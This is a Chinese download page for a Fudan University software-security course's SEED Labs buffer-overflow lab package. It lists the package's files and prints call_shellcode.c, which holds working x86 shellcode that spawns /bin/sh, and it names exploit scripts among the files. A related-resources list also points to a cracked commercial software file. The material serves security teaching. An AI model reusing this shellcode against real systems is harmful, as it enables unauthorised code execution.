资源简介
复旦大学_软件安全_SEED labs_1-Buffer Overflow实验
是从雪城大学SEED labs上找的实验
资源包括:原始文件夹、攻击代码、实验报告详细版
代码片段和文件信息
/* call_shellcode.c */
/*A program that creates a file containing code for launching shell*/
#include
#include
const char code[] =
“\x31\xc0“ /* xorl %eax%eax */
“\x50“ /* pushl %eax */
“\x68““//sh“ /* pushl $0x68732f2f */
“\x68““/bin“ /* pushl $0x6e69622f */
“\x89\xe3“ /* movl %esp%ebx */
“\x50“ /* pushl %eax */
“\x53“ /* pushl %ebx */
“\x89\xe1“ /* movl %esp%ecx */
“\x99“ /* cdq */
“\xb0\x0b“ /* movb $0x0b%al */
“\xcd\x80“ /* int $0x80 */
;
int main(int argc char **argv)
{
char buf[sizeof(code)];
strcpy(buf code);
((void(*)( ))buf)( );
}
属性 大小 日期 时间 名称
----------- --------- ---------- ----- ----
目录 0 2019-06-27 23:38 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\
文件 975 2019-03-05 15:42 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\call_shellcode.c
文件 1590 2019-03-07 21:53 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\exploit.c
文件 1256 2019-04-28 19:47 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\exploit_1.c
文件 859441 2019-06-27 23:38 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\lab1实验报告_16级.pdf
文件 578 2019-03-05 17:57 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\stack.c
目录 0 2019-06-27 22:02 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\
文件 171051 2019-06-21 19:33 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\Buffer_Overflow.pdf
文件 951 2019-03-06 11:34 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\call_shellcode.c
文件 1260 2019-03-06 11:34 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\exploit.c
文件 1543 2019-03-06 11:34 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\exploit.py
文件 550 2019-03-06 11:34 复旦大学_软件安全_SEED labs_1-Buffer Overflow实验\原始文件夹Buffer_Overflow\stack.c
- 上一篇:malloclab全套资料及参考答案
- 下一篇:FlexCAN详解
相关资源
- IBM Rational Software Architect 9.0破解文件
- n.Software.IPWorks!.2016.V16.0.6446
- Software Defined Storage For Dummies
- 英特尔主板驱动(Intel Chipset Device S
- Spring Security架构以及源码详析
- IT十年经典书系列英文版-Design_Patter
- springBoot+security+oauth2 资源和认证分离
- 软件测试参考论文
- Spring Boot和Spring Security4最新整合
- Beyond Software Architecture - Creating and Su
- 12 More Essential Skills for Software Architec
- spring_gateway_security_webflux.rar
- renren-security最新的开发文档
- Hacking Exposed: Mobile Security Secrets & Sol
- 软件测试第二版Software Testing(Second
- 高通9x07 软件架构及用户指导 mdm9x07
- 大学数据分析课程R软件实验教材
- 复旦大学_软件安全_SEED labs_8- Spectre
- HCIP-Security试题03带解析.pdf
- The Handbook of Fixed Income Securities 8th Ed
- Modeling in Event-B System and Software Engine
- wdsecuritysetup
- CRYPTOGRAPHY AND NETWORK SECURITY PRINCIPLES A
- spring security教程
- Windows Security Monitoring Scenarios and Patt
- Domain Modeling Made Functional Tackle Softwar
- Mastering AWS Security Create and maintain a s
-
Growing ob
ject-Oriented Software Guided by - Software Development Design and Coding With Pa
- Software Architecture in Practice(3rd) 无水
评论
共有 条评论